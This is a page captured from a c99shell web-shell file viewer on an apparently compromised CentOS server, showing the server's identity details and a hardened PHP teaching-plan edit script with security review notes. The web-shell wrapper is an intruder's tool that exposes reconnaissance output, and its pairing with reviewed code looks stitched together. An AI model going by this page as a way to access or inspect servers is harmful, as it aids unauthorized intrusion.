!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)


Viewing file:     EditPlan.php (8.87 KB)      -rw-r--r--
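<?php
    /**
     * EditPlan.php -- saves an edited teaching plan.
     *
     * Reads the posted form, optionally stores an uploaded document, then
     * updates tech_plan_tb, tech_spec_tb and techplan_method_tb for one
     * Plan_code.
     *
     * Review changes in this version:
     *   - every value placed in an SQL string is escaped (the original
     *     interpolated request data directly into the queries);
     *   - the upload is limited to an extension allow-list, is moved with
     *     move_uploaded_file(), and the old file name read from the database
     *     is reduced to its base name before unlink();
     *   - the logged-in user name is read from $_SESSION instead of a global
     *     that register_globals could fill from the request;
     *   - the plan UPDATE is skipped, not run with an undefined query, when a
     *     file is uploaded but courseId is empty.
     *
     * NOTE(review): the UPDATE statements are keyed only on Plan_code. Nothing
     * visible in this file ties the plan to the logged-in user ($rss is fetched
     * but never consulted), so any authenticated user can presumably edit any
     * plan -- confirm and add an ownership check.
     */

    /** Returns a scalar POST field, or '' when it is absent or not scalar. */
    function _editPlanPost($key)
    {
        return (isset($_POST[$key]) && is_scalar($_POST[$key])) ? $_POST[$key] : '';
    }

    /**
     * Returns a value the original script used without ever assigning it
     * (Plan_code, acadYear, semester, courseCode, conditionId1/2, Assess_code,
     * Sp11).
     *
     * NOTE(review): presumably these arrived through register_globals or an
     * included file -- confirm. An already defined global wins; otherwise the
     * request value is used; otherwise ''.
     */
    function _editPlanImplicit($name)
    {
        if (isset($GLOBALS[$name]) && is_scalar($GLOBALS[$name])) {
            return $GLOBALS[$name];
        }
        return (isset($_REQUEST[$name]) && is_scalar($_REQUEST[$name])) ? $_REQUEST[$name] : '';
    }

    /**
     * Escapes a request value for use inside a single-quoted SQL literal.
     *
     * Slashes added by magic_quotes_gpc are removed first so the stored text is
     * the same whether or not that setting is on. Assumes DBConn has already
     * opened the default mysql link, which the bare mysql_query() call further
     * down relies on as well.
     */
    function _editPlanSql($value)
    {
        $value = (string) $value;
        if (get_magic_quotes_gpc()) {
            $value = stripslashes($value);
        }
        return mysql_real_escape_string($value);
    }

    /** Builds "col='value' , col='value'" from a column => raw value map. */
    function _editPlanSet($columns)
    {
        $parts = array();
        foreach ($columns as $column => $value) {
            $parts[] = $column . "='" . _editPlanSql($value) . "'";
        }
        return implode(" , ", $parts);
    }

    /**
     * Validates and stores one uploaded file.
     *
     * Returns the stored file name, or '' when the upload is rejected.
     * The stored name is a timestamp plus the (lower-cased) extension, as in
     * the original, but only extensions on the allow-list are accepted: an
     * unrestricted upload into a web-served directory lets a caller place a
     * server-side script there.
     *
     * NOTE(review): the allow-list below is an assumption about which document
     * types this form needs -- adjust it, and make sure the target directory
     * is not configured to execute scripts.
     */
    function _editPlanStoreUpload($file, $targetDir)
    {
        $allowed = array('pdf', 'doc', 'docx', 'xls', 'xlsx', 'ppt', 'pptx', 'txt', 'jpg', 'jpeg', 'png', 'gif');

        if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
            return '';
        }
        if (!is_string($file['name']) || !is_uploaded_file($file['tmp_name'])) {
            return '';
        }

        $dot = strrchr($file['name'], ".");
        $extension = ($dot === false) ? '' : strtolower(substr($dot, 1));
        if (!in_array($extension, $allowed, true)) {
            return '';
        }

        $storedName = date('YmdHis') . "." . $extension;
        // move_uploaded_file() replaces the original copy() + unlink() pair and
        // refuses anything that is not a genuine HTTP upload.
        if (!move_uploaded_file($file['tmp_name'], $targetDir . $storedName)) {
            return '';
        }
        return $storedName;
    }

    session_start();

    /**  Define Validate Access  */
    // The value argument is not visible in the listing; 1 is assumed.
    define('_VALID_ACCESS', 1);

    /**  Check Session User Login  */
    // NOTE(review): the redirect fires only when BOTH session variables are
    // missing, so a session carrying just one of them passes. If both are
    // required this should be "||" -- confirm against the login page.
    if (!session_is_registered("valid_user") && !session_is_registered("Priority")) {
        echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
        echo "<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
        echo "<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
        exit();
    }
    else {

        /**  Configuration  */
        require_once("../configuration.php");
        require_once($_Config_absolute_path . "/includes/framework.php");
        require_once("../include/Function.php");
        require_once("../include/FunctionDB.php");

        /**  Create Database Object  */
        $dbObj = new DBConn;

        //=== SESSION
        // Taken from the session store only; the original read the global
        // $valid_user, which the request can set when register_globals is on
        // and the variable is not in the session.
        $Username = (isset($_SESSION['valid_user']) && is_scalar($_SESSION['valid_user'])) ? $_SESSION['valid_user'] : '';

        /**  Config Table for This Page  */
        $myTable1 = "personal_tb";

        /**  Table  -->  personal_tb  */
        $query1  = " SELECT *  FROM $myTable1  WHERE Username='" . mysql_real_escape_string((string) $Username) . "' ";
        $result1 = $dbObj->execQuery($query1);
        $rss     = $dbObj->fetchArray($result1);

        // Raw form fields. They are escaped where the SQL is built, not here,
        // so templates included later still see the values as posted.
        $Teacher_code = _editPlanPost('Teacher_code');
        $Status       = _editPlanPost('Status');
        $programId    = _editPlanPost('programId');
        $courseId     = _editPlanPost('courseId');
        $Method_code  = _editPlanPost('Method_code');
        $Place        = trim(_editPlanPost('Place'));
        $Course_code  = _editPlanPost('courseCode');
        $courseName   = _editPlanPost('courseName');
        $courseUnit   = _editPlanPost('courseUnit');
        $Total_std    = _editPlanPost('Total_std');
        $Total_hour   = _editPlanPost('Total_hour');

        // Start date (day/month/year): converted by the project helper
        // dmyE2ymdE2(); this overrides the posted Start_date, as in the original.
        $Start_date = dmyE2ymdE2(isset($_REQUEST["mDate"]) ? $_REQUEST["mDate"] : '');

        // Free-text fields are HTML-encoded before storage, as in the original.
        $Mainidea   = htmlspecialchars(trim(_editPlanPost('Mainidea')));    // main idea
        $Objective  = htmlspecialchars(trim(_editPlanPost('Objective')));   // topic taught
        $Title_name = htmlspecialchars(trim(_editPlanPost('Title_name')));  // topic taught

        // The original author marked the next two fields as "not sure where
        // these come from".
        $Media    = htmlspecialchars(trim(_editPlanPost('Media')));
        $Appendix = htmlspecialchars(trim(_editPlanPost('Appendix')));

        $Res_unit = _editPlanPost('Res_unit');  // classroom research
        $Apply    = _editPlanPost('Apply');     // research results reused in other research

        //---  Teaching methods
        // M21 is read but the UPDATE below has never written it.
        // NOTE(review): confirm whether techplan_method_tb has an M21 column.
        $methodColumns = array();
        for ($i = 1; $i <= 21; $i++) {
            $field  = 'M' . $i;
            $$field = _editPlanPost($field);
            if ($i <= 20) {
                $methodColumns[$field] = $$field;
            }
        }
        $M_else      = _editPlanPost('M_else');
        $M_Else_desc = trim(_editPlanPost('Else_desc'));
        $methodColumns['M_else']    = $M_else;
        $methodColumns['Else_desc'] = $M_Else_desc;

        //---  Lesson plan characteristics
        $specColumns = array();
        for ($i = 1; $i <= 10; $i++) {
            $field  = 'Sp' . $i;
            $$field = _editPlanPost($field);
            $specColumns[$field] = $$field;
        }
        $Sp_Else_desc = trim(_editPlanPost('Sp_Else_desc'));
        $specColumns['Sp11']      = _editPlanImplicit('Sp11');
        $specColumns['Else_desc'] = $Sp_Else_desc;

        //---  Measurement and evaluation methods
        $Asses1 = _editPlanPost('Asses1');
        $Asses2 = _editPlanPost('Asses2');
        $Asses3 = _editPlanPost('Asses3');
        $Asses4 = _editPlanPost('Asses4');

        // Row selector shared by all three UPDATE statements.
        $planWhere = "WHERE Plan_code='" . _editPlanSql(_editPlanImplicit('Plan_code')) . "' ";

        $planColumns = array(
            'acadYear'     => _editPlanImplicit('acadYear'),
            'semester'     => _editPlanImplicit('semester'),
            'programId'    => $programId,
            'courseCode'   => _editPlanImplicit('courseCode'),
            'conditionId1' => _editPlanImplicit('conditionId1'),
            'conditionId2' => _editPlanImplicit('conditionId2'),
            'Method_code'  => $Method_code,
            'Status'       => $Status,
            'courseId'     => $courseId,
            'Start_date'   => $Start_date,
            'Objective'    => $Objective,
            'Mainidea'     => $Mainidea,
            'Title_name'   => $Title_name,
            'Total_hour'   => $Total_hour,
            'Total_std'    => $Total_std,
            'Assess_code'  => _editPlanImplicit('Assess_code'),
            'Place'        => $Place,
            'Media'        => $Media,
            'Appendix'     => $Appendix,
            'Res_unit'     => $Res_unit,
            'Apply'        => $Apply,
            'Asses1'       => $Asses1,
            'Asses2'       => $Asses2,
            'Asses3'       => $Asses3,
            'Asses4'       => $Asses4,
        );

        $Path = "../Plan_pic";
        // The original assigned $Path but used $PlanPicPath for every file
        // operation.
        // NOTE(review): confirm $PlanPicPath is set by configuration.php and
        // cannot be supplied by the request; the fallback is the directory
        // named just above.
        $uploadDir = (isset($PlanPicPath) && is_string($PlanPicPath)) ? $PlanPicPath : $Path . "/";

        $strSQL = null;

        //###  Upload document file
        if (isset($_FILES['Filetex']['name']) && $_FILES['Filetex']['name'] != "") {

            $Filetex = _editPlanStoreUpload($_FILES['Filetex'], $uploadDir);

            if ($Filetex != "") {
                // Delete the previous document only after the new one is stored,
                // so a rejected upload cannot leave the plan without a file.
                $query1  = "select Filetex from tech_plan_tb " . $planWhere;
                $result1 = mysql_query($query1);
                if ($result1) {
                    $rs = mysql_fetch_array($result1);
                    // basename() keeps a stored value such as "../x" from
                    // pointing outside the upload directory.
                    $oldName = (is_array($rs) && !empty($rs["Filetex"])) ? basename($rs["Filetex"]) : '';
                    if ($oldName != "" && is_file($uploadDir . $oldName)) {
                        unlink($uploadDir . $oldName);
                    }
                    $dbObj->freeresult($result1);
                }
                $planColumns['Filetex'] = $Filetex;
            }

            //---  Table  -->  'tech_plan_tb'
            // As in the original, this branch updates the plan only when
            // courseId is present. NOTE(review): the no-upload branch has no
            // such condition -- confirm which behaviour is intended.
            if ($courseId != "") {
                $strSQL = " UPDATE tech_plan_tb  SET  " . _editPlanSet($planColumns) . " , date_updated=NOW()   " . $planWhere;
            }
        } else {
            $strSQL = " UPDATE tech_plan_tb  SET  " . _editPlanSet($planColumns) . " , date_updated=NOW()   " . $planWhere;
        }

        if ($strSQL !== null) {
            $result = $dbObj->runQuery($strSQL);
            $dbObj->freeresult($result);
        }

        //---  Table  -->  'tech_spec_tb'
        $strSQL1 = " UPDATE tech_spec_tb  SET " . _editPlanSet($specColumns) . " , date_updated=NOW()  " . $planWhere;
        $result1 = $dbObj->runQuery($strSQL1);
        $dbObj->freeresult($result1);

        //---  Table  -->  'techplan_method_tb'
        $strSQL2 = " UPDATE techplan_method_tb  SET " . _editPlanSet($methodColumns) . " , date_updated=NOW()  " . $planWhere;
        $result2 = $dbObj->runQuery($strSQL2);
        $dbObj->freeresult($result2);

    }
    # else

?>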
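<?php
    /*
     * Confirmation page shown after the plan is saved; it redirects back to
     * PlanList.php for the same teacher.
     *
     * $Teacher_code comes from the posted form, so it is URL-encoded and
     * HTML-escaped wherever it is written into the page. The original printed
     * it raw into an href and a meta-refresh URL, which let a crafted value
     * break out of the attribute.
     */
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link href="../css/default.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="../js/utilities.js"></script>
<title>ข้อมูลทั่วไปบุคลากร - ข้อมูลแผนการสอน - แก้ไขข้อมูลแผนการสอน</title>
</head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">
<?php
    
include("../templates/incHeader.php");
?>
<table width="1003" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="203" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include("./_incMainMenu.php");?></td>
    <td width="800" height="440" align="center" valign="top" style="padding:10px 0px 5px 10px"><fieldset>
     <table width="780" border="0" cellspacing="0" cellpadding="0">
      <form id="myForm" name="myForm" method="post" action="">
      <tr>
        <td height="5"></td>
      </tr>
      <tr>
        <td height="30" background="../images/background/bg-head-topic-w780.gif" class="PADDING-LEFT-10"><strong><a href="index.php">หน้าหลัก</a></strong> <strong>&raquo; <a href="Menu_Teach.php">ข้อมูลทั่วไปบุคลากร</a> &raquo; <a href="PlanList.php?Teacher_code=<?php echo htmlspecialchars(urlencode($Teacher_code), ENT_QUOTES); ?>">ข้อมูลแผนการสอน</a> &raquo; <span class="NOTE">เพิ่มข้อมูลแผนการสอน</span></strong></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td height="150" align="center"><span class="TEXT-GREEN10"><strong>ระบบจัดเก็บข้อมูลของท่านเรียบร้อยแล้ว</strong></span><br />
          กรุณารอส้กครู่ กำลังเปลี่ยนหน้าอัตโนมัติ<br />
          <?php echo "<meta http-equiv=\"refresh\" content=\"0; URL=PlanList.php?Teacher_code=" . htmlspecialchars(urlencode($Teacher_code), ENT_QUOTES) . "\">"; ?></td>
      </tr>
      <tr>
        <td height="345">&nbsp;</td>
      </tr></form>
    </table>
   </fieldset></td>
  </tr>
</table>
<?php include("../templates/incFooter.php"); ?>
</body>
</html>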
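<?php
    /*
     * End-of-page cleanup: release any result still open, close the database
     * connection and drop the DBConn object.
     */

    /**  Free Resource */
    // $result1 is already passed to freeresult() right after the tech_spec_tb
    // UPDATE earlier in this script, so free it again only if it is still a
    // live result resource. The original called freeresult() on it a second
    // time unconditionally.
    if (isset($result1) && is_resource($result1)) {
        $dbObj->freeresult($result1);
    }

    /**  Close the Database  */
    $dbObj->disconn();

    /**  Unset Class  */
    unset($dbObj);
?>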

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0145 ]--